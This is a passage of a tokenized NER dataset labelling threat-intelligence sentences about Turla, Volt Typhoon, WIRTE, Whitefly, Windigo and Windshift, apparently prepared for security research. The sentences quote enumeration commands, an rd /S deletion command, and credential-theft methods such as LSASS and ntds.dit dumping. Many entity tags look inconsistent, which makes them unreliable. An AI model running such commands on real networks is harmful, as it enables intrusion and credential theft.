"upon", "check-in", "to", "discover", "remote", "systems", "on", "a", "local", "network", "using", "the", "<code>net", "view</code>", "and", "<code>net", "view", "/DOMAIN</code>", "commands.", "Turla", "has", "also", "used", "<code>net", "group", "\"Domain", "Computers\"", "/domain</code>,", "<code>net", "group", "\"Domain", "Controllers\"", "/domain</code>,", "and", "<code>net", "group", "\"Exchange", "Servers\"", "/domain</code>", "to", "enumerate", "domain", "computers,", "including", "the", "organization's", "DC", "and", "Exchange", "Server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "used", "<code>net", "use</code>", "commands", "to", "connect", "to", "lateral", "systems", "within", "a", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "obtained", "information", "on", "security", "software,", "including", "security", "logging", "information", "that", "may", "indicate", "whether", "their", "malware", "has", "been", "detected." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "compromised", "servers", "as", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Turla", "attempted", "to", "trick", "targets", "into", "clicking", "on", "a", "link", "featuring", "a", "seemingly", "legitimate", "domain", "from", "Adobe.com", "to", "download", "their", "malware", "and", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "operating", "system", "configuration", "details", "using", "the", "<code>systeminfo</code>", "and", "<code>set</code>", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "network", "configuration", "details", "using", "the", "<code>arp", "-a</code>,", "<code>nbtstat", "-n</code>,", "<code>net", "config</code>,", "<code>ipconfig", "/all</code>,", "and", "<code>route</code>", "commands,", "as", "well", "as", "NBTscan.", "Turla", "RPC", "backdoors", "have", "also", "retrieved", "registered", "RPC", "interface", "information", "from", "process", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "active", "local", "network", "connections", "using", "the", "<code>netstat", "-an</code>,", "<code>net", "use</code>,", "<code>net", "file</code>,", "and", "<code>net", "session</code>", "commands.", "Turla", "RPC", "backdoors", "have", "also", "enumerated", "the", "IPv4", "TCP", "connection", "table", "via", "the", "<code>GetTcpTable2</code>", "API", "call." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "running", "services", "and", "associated", "processes", "using", "the", "<code>tasklist", "/svc</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "the", "system", "time", "by", "using", "the", "<code>net", "time</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "obtained", "and", "customized", "publicly-available", "tools", "like", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Turla", "has", "used", "the", "VPS", "infrastructure", "of", "compromised", "Iranian", "threat", "actors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Area", "I-HackOrg", "O" ] }, { "tokens": [ "Turla", "has", "used", "VBS", "scripts", "throughout", "its", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "legitimate", "web", "services", "including", "Pastebin,", "Dropbox,", "and", "GitHub", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "created", "web", "accounts", "including", "Dropbox", "and", "GitHub", "for", "C2", "and", "document", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Turla", "has", "frequently", "used", "compromised", "WordPress", "sites", "for", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "RPC", "backdoors", "have", "used", "cmd.exe", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "gathered", "credentials", "from", "the", "Windows", "Credential", "Manager", "tool." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "WMI", "event", "filters", "and", "consumers", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "established", "persistence", "by", "adding", "a", "Shell", "value", "under", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volatile", "Cedar", "has", "targeted", "publicly", "facing", "web", "servers,", "with", "both", "automatic", "and", "manual", "vulnerability", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volatile", "Cedar", "can", "deploy", "additional", "tools." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Volatile", "Cedar", "has", "performed", "vulnerability", "scans", "of", "the", "target", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volatile", "Cedar", "can", "inject", "web", "shell", "code", "into", "a", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Volatile", "Cedar", "has", "used", "DirBuster", "and", "GoBuster", "to", "brute", "force", "web", "directories", "and", "DNS", "subdomains." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "archived", "the", "ntds.dit", "database", "as", "a", "multi-volume", "password-protected", "archive", "with", "7-Zip." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "have", "inspected", "server", "logs", "to", "remove", "their", "IPs." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "attempted", "to", "obtain", "credentials", "from", "OpenSSH,", "realvnc,", "and", "PuTTY." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "staged", "collected", "data", "in", "password-protected", "archives." ], "ner_tags": [ "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "stolen", "the", "Active", "Directory", "database", "from", "targeted", "environments", "and", "used", "Wevtutil", "to", "extract", "event", "log", "information." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "run", "`net", "group", "/dom`", "and", "`net", "group", "\"Domain", "Admins\"", "/dom`", "in", "compromised", "environments", "for", "account", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "compromised", "domain", "accounts", "to", "authenticate", "to", "devices", "on", "compromised", "networks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "run", "`net", "group`", "in", "compromised", "environments", "to", "discover", "domain", "groups." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "gained", "initial", "access", "through", "exploitation", "of", "CVE-2021-40539", "in", "internet-facing", "ManageEngine", "ADSelfService", "Plus", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "run", "`rd", "/S`", "to", "delete", "their", "working", "directories", "and", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "the", "built-in", "netsh", "`port", "proxy`", "command", "to", "create", "proxies", "on", "compromised", "systems", "to", "facilitate", "access." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "attempted", "to", "access", "hashed", "credentials", "from", "the", "LSASS", "process", "memory", "space." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "copied", "web", "shells", "between", "servers", "in", "targeted", "environments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "saved", "stolen", "files", "including", "the", "ntds.dit", "database", "and", "the", "`SYSTEM`", "and", "`SECURITY`", "Registry", "hives", "locally", "to", "the", "`C:\\Windows\\Temp\\`", "directory." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "run", "`net", "localgroup", "administrators`", "in", "compromised", "environments", "to", "enumerate", "accounts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "`wevtutil.exe`", "and", "the", "PowerShell", "command", "`Get-EventLog", "security`", "to", "enumerate", "Windows", "logs", "to", "search", "for", "successful", "logons." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "appended", "copies", "of", "the", "ntds.dit", "database", "with", "a", ".gif", "file", "extension." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "legitimate", "looking", "filenames", "for", "compressed", "copies", "of", "the", "ntds.dit", "database", "and", "used", "names", "including", "cisco_up.exe,", "cl64.exe,", "vm3dservice.exe,", "watchdogd.exe,", "Win.exe,", "WmiPreSV.exe,", "and", "WmiPrvSE.exe", "for", "the", "Earthworm", "and", "Fast", "Reverse", "Proxy", "tools." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "ntds.util", "to", "create", "domain", "controller", "installation", "media", "containing", "usernames", "and", "password", "hashes." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "compromised", "small", "office", "and", "home", "office", "(SOHO)", "network", "edge", "devices,", "many", "of", "which", "were", "located", "in", "the", "same", "geographic", "area", "as", "the", "victim,", "to", "proxy", "network", "traffic." ], "ner_tags": [ "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "PowerShell", "including", "for", "remote", "system", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "enumerated", "running", "processes", "on", "targeted", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "compromised", "devices", "and", "customized", "versions", "of", "open", "source", "tools", "such", "as", "Fast", "Reverse", "Proxy", "(FRP),", "Earthworm,", "and", "Impacket", "to", "proxy", "network", "traffic." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "B-Way", "O", "B-Way", "O", "B-Purp", "O", "B-Purp" ] }, { "tokens": [ "Volt", "Typhoon", "has", "queried", "the", "Registry", "on", "compromised", "systems,", "`reg", "query", "hklm\\software\\`,", "for", "information", "on", "installed", "software." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "multiple", "methods,", "including", "Ping,", "to", "enumerate", "systems", "on", "compromised", "networks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "compromised", "PRTG", "servers", "from", "other", "organizations", "for", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "queried", "the", "Registry", "on", "compromised", "systems", "for", "information", "on", "installed", "software." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "a", "version", "of", "the", "Awen", "web", "shell", "that", "employed", "AES", "encryption", "and", "decryption", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "run", "system", "checks", "to", "determine", "if", "they", "were", "operating", "in", "a", "virtualized", "environment." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "discovered", "file", "system", "types,", "drive", "names,", "size,", "and", "free", "space", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "executed", "multiple", "commands", "to", "enumerate", "network", "topology", "and", "settings", "including", "`ipconfig`,", "`netsh", "interface", "firewall", "show", "all`,", "and", "`netsh", "interface", "portproxy", "show", "all`." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "`netstat", "-ano`", "on", "compromised", "hosts", "to", "enumerate", "network", "connections." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "executed", "the", "PowerShell", "command", "`Get-EventLog", "security", "-instanceid", "4624`", "to", "identify", "associated", "user", "and", "computer", "account", "names." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "customized", "versions", "of", "open-source", "tools", "for", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "webshells,", "including", "ones", "named", "AuditReport.jspx", "and", "iisstart.aspx,", "in", "compromised", "environments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "used", "the", "Windows", "command", "line", "to", "perform", "hands-on-keyboard", "activities", "in", "targeted", "environments", "including", "for", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volt", "Typhoon", "has", "leveraged", "WMIC", "including", "for", "execution", "and", "remote", "system", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "used", "Base64", "to", "decode", "malicious", "VBS", "script." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "WIRTE", "has", "downloaded", "PowerShell", "code", "from", "the", "C2", "server", "to", "be", "executed." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "attempted", "to", "lure", "users", "into", "opening", "malicious", "MS", "Word", "and", "Excel", "files", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Tool", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "named", "a", "first", "stage", "dropper", "`Kaspersky", "Update", "Agent`", "in", "order", "to", "appear", "legitimate." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "used", "HTTPS", "over", "ports", "2083", "and", "2087", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "used", "PowerShell", "for", "script", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "used", "`regsvr32.exe`", "to", "trigger", "the", "execution", "of", "a", "malicious", "script." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "sent", "emails", "to", "intended", "victims", "with", "malicious", "MS", "Word", "and", "Excel", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "obtained", "and", "used", "Empire", "for", "post-exploitation", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "WIRTE", "has", "used", "VBScript", "in", "its", "operations." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "WIRTE", "has", "used", "HTTP", "for", "network", "communication." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "used", "a", "simple", "remote", "shell", "tool", "that", "will", "call", "back", "to", "the", "C2", "server", "and", "wait", "for", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "used", "search", "order", "hijacking", "to", "run", "the", "loader", "Vcrodat." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "encrypted", "the", "payload", "used", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "used", "an", "open-source", "tool", "to", "exploit", "a", "known", "Windows", "privilege", "escalation", "vulnerability", "(CVE-2016-0051)", "on", "unpatched", "computers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "the", "ability", "to", "download", "additional", "tools", "from", "the", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "used", "Mimikatz", "to", "obtain", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "used", "malicious", ".exe", "or", ".dll", "files", "disguised", "as", "documents", "or", "images." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "named", "the", "malicious", "DLL", "the", "same", "name", "as", "DLLs", "belonging", "to", "legitimate", "software", "from", "various", "security", "vendors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Whitefly", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Windigo", "has", "used", "a", "Perl", "script", "for", "information", "gathering." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "O" ] }, { "tokens": [ "Windigo", "has", "used", "a", "script", "to", "gather", "credentials", "in", "files", "left", "on", "disk", "by", "OpenSSH", "backdoors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windigo", "has", "distributed", "Windows", "malware", "via", "drive-by", "downloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windigo", "has", "used", "a", "script", "to", "check", "for", "the", "presence", "of", "files", "created", "by", "OpenSSH", "backdoors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Windigo", "has", "delivered", "a", "generic", "Windows", "proxy", "Win32/Glubteta.M.", "Windigo", "has", "also", "used", "multiple", "reverse", "proxy", "chains", "as", "part", "of", "their", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windigo", "has", "used", "a", "script", "to", "detect", "installed", "software", "on", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windigo", "has", "used", "a", "script", "to", "detect", "which", "Linux", "distribution", "and", "version", "is", "currently", "installed", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "compromised", "websites", "to", "register", "custom", "URL", "schemes", "on", "a", "remote", "system." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "tools", "to", "deploy", "additional", "payloads", "to", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "revoked", "certificates", "to", "sign", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "e-mail", "attachments", "to", "lure", "victims", "into", "executing", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "links", "embedded", "in", "e-mails", "to", "lure", "victims", "into", "executing", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "icons", "mimicking", "MS", "Office", "files", "to", "mask", "malicious", "executables.", "Windshift", "has", "also", "attempted", "to", "hide", "executables", "by", "changing", "the", "file", "extension", "to", "\".scr\"", "to", "mimic", "Windows", "screensavers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "string", "encoding", "with", "floating", "point", "calculations." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "malware", "to", "enumerate", "active", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "created", "LNK", "files", "in", "the", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "malware", "to", "identify", "installed", "AV", "and", "commonly", "used", "forensic", "and", "malware", "analysis", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Windshift", "has", "used", "malware", "to", "identify", "installed", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "sent", "spearphishing", "emails", "with", "attachment", "to", "harvest", "credentials", "and", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "sent", "spearphishing", "emails", "with", "links", "to", "harvest", "credentials", "and", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "fake", "personas", "on", "social", "media", "to", "engage", "and", "target", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "malware", "to", "identify", "the", "computer", "name", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", 